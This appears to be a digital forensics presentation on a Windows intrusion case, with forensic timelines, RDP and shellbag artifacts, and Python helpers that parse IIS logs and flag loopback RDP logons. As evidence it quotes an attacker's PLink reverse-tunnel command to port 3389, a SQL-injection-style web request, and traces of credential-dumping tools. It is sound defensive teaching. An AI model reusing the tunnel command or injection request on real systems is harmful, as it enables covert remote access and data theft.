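from urllib.parse import parse_qs

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2019-01-22 01:45:33 10.0.0.5 GET /images/Browse.asp sqlorderby_A=&sqlwhere_A=(%22email%22+Like+'NAME%40EMAIL.com%25')&sqlpagesize_A=10&sqlfrom_A=%22dbo%22.%22%3CSYSTEM%3E_USERS%22 443 192.168.1.101 200
2019-01-22 02:30:12 10.0.0.5 POST /images/Command.asp nocache=1/8/2017+12:34:10+PM 443 192.168.1.101 200
"""


def parse_iis_log(text):
    """Return one dict per request, keyed by the names in the #Fields header."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]        # header may repeat after a restart
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log line before #Fields header")
        parts = line.split(" ")
        if len(parts) != len(fields):
            raise ValueError("field count mismatch: %r" % line)
        records.append(dict(zip(fields, parts)))
    return records


def decode_query(cs_uri_query):
    """URL-decode cs-uri-query (%XX and '+' handled); '-' means no query string."""
    if cs_uri_query in ("", "-"):
        return {}
    return parse_qs(cs_uri_query, keep_blank_values=True)


def decode_logged_url(url):
    """Split a logged URL into its stem and decoded parameters (slide 32 example)."""
    stem, _, query = url.partition("?")
    return stem, decode_query(query)


def summarise(record):
    """Combine method, stem and decoded parameters; flag what the log cannot show."""
    method = record["cs-method"].upper()
    return {
        "time": record["date"] + " " + record["time"],
        "client": record.get("c-ip"),
        "method": method,
        "stem": record["cs-uri-stem"],
        "query_params": decode_query(record["cs-uri-query"]),
        # A POST carries its key/value pairs in the body, which IIS does not log,
        # so for POST the logged parameters are at best the URL's own query string
        "body_params_logged": method != "POST",
    }


def summarise_log(text):
    return [summarise(r) for r in parse_iis_log(text)]


if __name__ == "__main__":
    for row in summarise_log(SAMPLE_LOG):
        print(row["time"], row["client"], row["method"], row["stem"],
              row["query_params"], "body logged:", row["body_params_logged"])
```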
34
What do we know so far?
Time | Source | Details
2019-01-22 01:33:23 | EventLog | Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
2019-01-22 01:33:23 | EventLog | Remote Desktop Services: Session logon succeeded User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
2019-01-22 01:35:34 | Registry:LastWrite | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip -> omg.zip
2019-01-22 01:39:03 | LNK:Create Time | C:\Users\dave\Desktop\results.txt (C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk)
2019-01-22 01:39:23 | FN:Create Time | C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
2019-01-22 01:39:23 | Registry:LastWrite | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt -> result.txt
2019-01-22 01:39:23 | UserAssist:Dave | C:\Users\dave\Desktop\omg.exe
2019-01-22 01:43:23 | UserAssist:Dave | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc
2019-01-22 01:44:56 | UserAssist:Dave | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe
2019-01-22 01:45:33 | IE:BrowserCache | Earliest Browser Cache Artifact Created
2019-01-22 02:28:01 | UserAssist:Dave | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe
2019-01-22 02:30:12 | IE:BrowserCache | Most Recent Browser Artifact Modified
2019-01-22 02:39:45 | EventLog | Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
2019-01-22 02:39:45 | EventLog | Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
§ What next?
36
RDP Event Logs
Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
Date & Time | EID | Message
2018-12-24 23:11:21 | 1149 | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
2019-01-22 00:23:33 | 1149 | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
38
RDP MRU Keys
Key Last Write | Registry Key
2018-12-25 00:00:23 | Hostname: 192.168.1.38 User: rewards\ITAdmin
2018-12-25 00:33:42 | Hostname: RewardsDB User: rewards\DBO
2019-01-01 02:53:11 | Hostname: Webserver2 User: rewards\frank
2019-01-15 00:15:01 | Hostname: ITJumpserver User: rewards\dave
39
RDP Bitmap Cache Files
§ Store frequently used images used during RDP session
§ Improves user experience
§ Located at:
- C:\Users\<username>\AppData\Local\Microsoft\Terminal Server Client\Cache\bcache2.bmc
- C:\Users\<username>\AppData\Local\Microsoft\Terminal Server Client\Cache\Cache[0-9]{4}.bin
40
41
Uninstall or Disable Endpoint Agents
42
Registry Shellbags
§ Windows Explorer usage
§ Records size, position, view of windows
§ Provides evidence of user access to local & remote directories
- HKEY_USERS\{SID}\Software\Microsoft\Windows\Shell
- HKEY_USERS\{SID}\Software\Microsoft\Windows\ShellNoRoam
Registry File on Disk (Windows Vista/2008+): \Users\<username>\AppData\Local\Microsoft\Windows\USRCLASS.DAT
43
Registry Shellbags
Decoded shellbag keys can provide
- Paths to directories accessed via Explorer
- Date and time at which last access occurred
- MAC times of each path tracked in shellbags
Decoding tools
- RegRipper
- shellbags.py github.com/williballenthin/shellbags
- ShellBagsExplorer
• https://ericzimmerman.github.io/#!index.md
44
ShellBags
MRU Time | Modified | Accessed | Created | Resource
2019-01-11 03:51:36 | 2018-12-30 02:59:32 | 2016-12-30 02:59:32 | 2017-11-05 14:40:54 | My Computer\C:\Users\ITAdmin [Desktop0043]
2019-01-11 03:51:54 | 2018-05-07 15:54:36 | 2016-11-05 14:40:54 | 2017-11-05 14:40:54 | My Computer\C:\Users\ITAdmin\AppData [Desktop00430]
- | - | - | - | My Network Places\hqdc1.com\hqdc1.com\general [Desktop240]
2018-12-25 02:40:59 | 2012-11-11 17:00:06 | 2012-11-11 17:00:06 | 2012-11-11 17:00:06 | My Network Places\hqdc1.com\hqdc1.com\general\DC01 [Desktop2400]
2018-12-25 02:40:59 | 2014-05-23 21:53:24 | 2018-05-23 21:53:24 | 2011-04-07 12:28:28 | My Network Places\hqdc1.com\hqdc1.com\general\DC01\ITIO Server Infrastructure [
2019-01-12 03:41:41 | 2017-01-10 14:07:12 | 2017-01-10 14:07:12 | 2017-05-02 13:45:42 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop [Desktop290000]
2019-01-12 03:42:22 | 2017-01-11 18:42:04 | 2017-01-11 18:42:04 | 2017-01-10 14:06:56 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\VDI [Desktop2900000]
2019-01-12 03:47:49 | 2017-01-05 21:37:52 | 2017-01-05 21:37:52 | 2017-01-05 20:05:26 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\AD Resumes [Desktop2900001]
2019-01-12 03:41:42 | 2016-12-18 14:49:14 | 2016-12-18 14:49:14 | 2015-01-26 19:43:56 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\My Impo'tant stuff [Desktop2900002]
2019-01-12 03:53:14 | 2016-12-15 20:57:58 | 2016-12-15 20:57:58 | 2016-11-24 22:18:00 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\O365 [Desktop2900003]
2019-01-12 03:53:47 | 2015-09-23 13:52:10 | 2015-09-23 13:52:10 | 2016-05-02 13:45:42 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData [Desktop290001]
2019-01-11 03:46:21 | 2016-09-27 13:38:42 | 2016-09-27 13:38:42 | 2016-05-02 13:45:42 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData\Roaming [Desktop2900010]
45
How did the attacker access the host?
§ Remotely installed ScreenConnect
§ Switched Tactics and removed ScreenConnect/Installed malware
§ Non-Interactive malware used to download and execute PLink.exe to create tunnel
- tunnel@<IP Address> -pw <Password> -P 443 -2 -4 -T -N -C -R 44489:127.0.0.1:3389
§ Connected to local host using remote desktop
Key | Value | Data
Software\SimonTatham\PuTTY\SshHostKeys | rsa2@<IP Address> | 0x10001,0x<SSH Public Key>
46
Windows 10 Timeline
§ Timeline exists in Task View
- Accessed by hitting Win+Tab
§ Records timeline of user activity for specific applications
§ User Engaged
§ Generic Events
§ Database location:
- C:\Users\User\AppData\Local\ConnectedDevicesPlatform\L.User\ActivitiesCache.db
49
Windows Timeline
§ Parsing
- Multiple Available Tools
• https://tzworks.net/prototype_page.php?proto_id=41
• https://github.com/log2timeline/plaso/pull/2076
• https://ericzimmerman.github.io/#!index.md
- SQLite3
50
Windows 10 Timeline
Start - UTC | End - UTC | Application | DisplayText or Type | Details
2019-02-08 23:04:27 | N/A | WinRAR\WinRAR.exe | sdl-redline.zip | Z:\Downloads\sdl-redline.zip
2019-02-09 01:07:06 | N/A | Cisco.AnyConnect | Cisco AnyConnect Secure Mobility Client | black
2019-02-10 13:09:53 | N/A | Microsoft.MicrosoftEdge | cmd - Bing | https://www.bing.com/search?q=cmd&form=WNSGPH http://adaptivecards[.]io/schemas/adaptive-card.json
2019-02-10 13:10:34 | 2019-02-10 13:10:51 | Microsoft.MicrosoftEdge | UserEngaged | https://ericzimmerman.github.io/#!index.md
2019-02-12 13:58:46 | 2019-02-12 13:58:48 | Microsoft.MicrosoftEdge | UserEngaged | https://www.google.com/search?eiadd+on+vpn&oq=add+on+vpn
2019-02-12 13:59:02 | N/A | Wireshark\Wireshark.exe | Wireshark | black
2019-02-12 18:57:11 | N/A | Wireshark\Wireshark.exe | 107.x.x.x-10.24.206.133-1552495684.flow | Z:\Downloads\107.x.x.x-10.24.206.133-1552495684.flow
2019-02-12 19:02:27 | N/A | Wireshark\Wireshark.exe | 104.x.x.x-10.222.7.44-1552442420.flow | Z:\Downloads\104.x.x.x-10.222.7.44-1552442420.flow
2019-02-16 00:47:42 | N/A | Microsoft.MSPaint | Paint 3D | black
2019-02-16 00:50:34 | N/A | Microsoft.MSPaint | Picture2.jpg | Z:\Desktop\Picture2.jpg
2019-02-16 03:16:13 | N/A | mspaint.exe | Picture1.png | Z:\Presentations\DFIR\Picture1.png
2019-02-16 03:16:56 | N/A | mspaint.exe | Picture2.png | Z:\Presentations\DFIR\Picture2.png
2019-02-16 18:41:00 | N/A | WinRAR\WinRAR.exe | 4mXTuLp5E19cNdVvUX9jzb.zip | Z:\Downloads\TuLp5E19cNdVvUX9jzb.zip
2019-02-16 18:41:33 | N/A | Redline\Redline.exe | MBP0074.mans | Z:\MBP0074.mans
52

| Time | Source | System | Details |
| --- | --- | --- | --- |
| 2018-12-24 23:11:21 | EventLog | ConfPC | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 |
| 2018-12-25 00:00:23 | RDP:MRU | ConfPC | Hostname: 192.168.1.38 User: rewards\ITAdmin |
| 2018-12-25 00:33:42 | RDP:MRU | ConfPC | Hostname: RewardsDB User: rewards\DBO |
| 2018-12-25 02:40:59 | ShellBag:MRU | ConfPC | My Network Places\hqdc1.com\hqdc1.com\general\DC01 [Desktop2400] |
| 2018-12-25 02:40:59 | ShellBag:MRU | ConfPC | My Network Places\hqdc1.com\hqdc1.com\general\DC01\ITIO Server Infrastructure [ |
| 2018-12-25 02:40:59 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData [Desktop290001] |
| 2019-01-01 02:53:11 | RDP:MRU | ConfPC | Hostname: Webserver2 User: rewards\frank |
| 2019-01-11 03:46:21 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData\Roaming [Desktop2900010] |
| 2019-01-11 03:51:36 | ShellBag:MRU | ConfPC | My Computer\C:\Users\ITAdmin [Desktop0043] |
| 2019-01-11 03:51:54 | ShellBag:MRU | ConfPC | My Computer\C:\Users\ITAdmin\AppData [Desktop00430] |
| 2019-01-12 03:41:41 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop [Desktop290000] |
| 2019-01-12 03:41:42 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\My Impo'tant stuff [Desktop2900002] |
| 2019-01-12 03:42:22 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\VDI [Desktop2900000] |
| 2019-01-12 03:47:49 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\AD Resumes [Desktop2900001] |
| 2019-01-12 03:53:14 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\O365 [Desktop2900003] |
| 2019-01-12 03:53:47 | ShellBag:MRU | ConfPC | My Network Places\hqdc1.com\hqdc1.com\general [Desktop240] |
| 2019-01-15 00:15:01 | RDP:MRU | ConfPC | Hostname: ITJumpserver User: rewards\dave |
| 2019-01-22 00:23:33 | EventLog | ConfPC | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 |
| 2019-01-22 01:33:23 | EventLog | Jump | Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 |
| 2019-01-22 01:33:23 | EventLog | Jump | Remote Desktop Services: Session logon succeeded User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101 |
| 2019-01-22 01:35:34 | Registry:LastWrite | Jump | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip -> omg.zip |
| 2019-01-22 01:39:03 | LNK:Create Time | Jump | C:\Users\dave\Desktop\results.txt (C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk) |
| 2019-01-22 01:39:23 | FN:Create Time | Jump | C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk |
| 2019-01-22 01:39:23 | Registry:LastWrite | Jump | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt -> result.txt |
| 2019-01-22 01:39:23 | UserAssist:Dave | Jump | C:\Users\dave\Desktop\omg.exe |
| 2019-01-22 01:43:23 | UserAssist:Dave | Jump | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc |
| 2019-01-22 01:44:56 | UserAssist:Dave | Jump | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe |
| 2019-01-22 01:45:33 | IE:BrowserCache | Jump | Earliest Browser Cache Artifact Created |
| 2019-01-22 02:28:01 | UserAssist:Dave | Jump | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe |
| 2019-01-22 02:30:12 | IE:BrowserCache | Jump | Most Recent Browser Artifact Modified |
| 2019-01-22 02:39:45 | EventLog | Jump | Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2 |
| 2019-01-22 02:39:45 | EventLog | Jump | Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101 |
| 2019-01-22 02:55:45 | EventLog | ConfPC | Remote Desktop Services: Session has been disconnected: User: rewards\ITAdmin Session ID: 2 Source Network Address: 127.0.0.1 |
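The ConfPC rows above show the effect of the PLink tunnel from slide 45: the RDP authentication events carry a Source Network Address of 127.0.0.1 because the tunnel endpoint on the host connected to the local 3389 listener. The following added example (not from the presentation) runs that check over constructed log lines shaped like the EventLog rows in the table, flagging RDP authentications from a loopback address and summarising them per host and user; the line layout and the "LOCAL" source value are assumptions for the sample, not a real export format.

```python
import ipaddress
import re
from collections import Counter

# Constructed lines in the shape of the EventLog rows in the table above
# (TerminalServices-RemoteConnectionManager "User authentication succeeded").
SAMPLE_EVENTS = [
    "2018-12-24 23:11:21 ConfPC Remote Desktop Services: User authentication succeeded: "
    "User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1",
    "2019-01-22 00:23:33 ConfPC Remote Desktop Services: User authentication succeeded: "
    "User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1",
    "2019-01-22 01:33:23 Jump Remote Desktop Services: User authentication succeeded: "
    "User: dave Domain: rewards Source Network Address: 192.168.1.101",
    "2019-01-22 02:00:00 Jump Remote Desktop Services: User authentication succeeded: "
    "User: dave Domain: rewards Source Network Address: LOCAL",  # assumed non-IP value
]

EVENT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"Remote Desktop Services: User authentication succeeded: "
    r"User: (?P<user>\S+) Domain: (?P<domain>\S+) Source Network Address: (?P<src>\S+)$")


def parse_rdp_auth(line):
    """Return the fields of one RDP authentication line, or None if it is not one."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def loopback_rdp_logons(lines):
    """RDP authentications whose source address is loopback (127.0.0.0/8 or ::1).

    A remote desktop user normally arrives from another host. A localhost source
    means the client reached 3389 through something listening on the machine
    itself, here the PLink -R 44489:127.0.0.1:3389 tunnel, so it merits review."""
    hits = []
    for line in lines:
        ev = parse_rdp_auth(line)
        if ev is None:
            continue
        try:
            if ipaddress.ip_address(ev["src"]).is_loopback:
                hits.append(ev)
        except ValueError:
            pass  # non-IP sources such as "LOCAL" are not network logons
    return hits


def by_host_and_user(hits):
    """Count loopback RDP logons per (host, DOMAIN\\user) for triage."""
    return Counter((h["host"], f'{h["domain"]}\\{h["user"]}') for h in hits)
```

A loopback hit is a lead, not a verdict: corroborate it with the PuTTY SshHostKeys registry value and the tunnel process as the case study does.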
53
Case Study – Expanding View
§ Shellbags
§ RDP Logs
§ RDP Connections
§ LNK Files
§ MRU Keys
§ MuiCache
§ Jump Lists
§ RDP Bitmap Cache
§ SimonTatham Registry Values
§ Windows 10 Timeline
54
Other fun Artifacts

| Artifact | Details |
| --- | --- |
| Windows Recycler | C:\$Recycle.Bin\<SID>\ $R<RAND>.<EXT> $I<RAND>.<EXT> |
| Browser History | ftp://<AttackerWebsite> file:///C:/Windows/127.0.0.1.pwdump |
| OpenWith Registry Keys | Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cachedump\OpenWithList, Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.fgdump-log\OpenWithList |
| ViClient Logs | C:\Users\admin\AppData\Local\VMware\vpx\viclient-#-0000.log |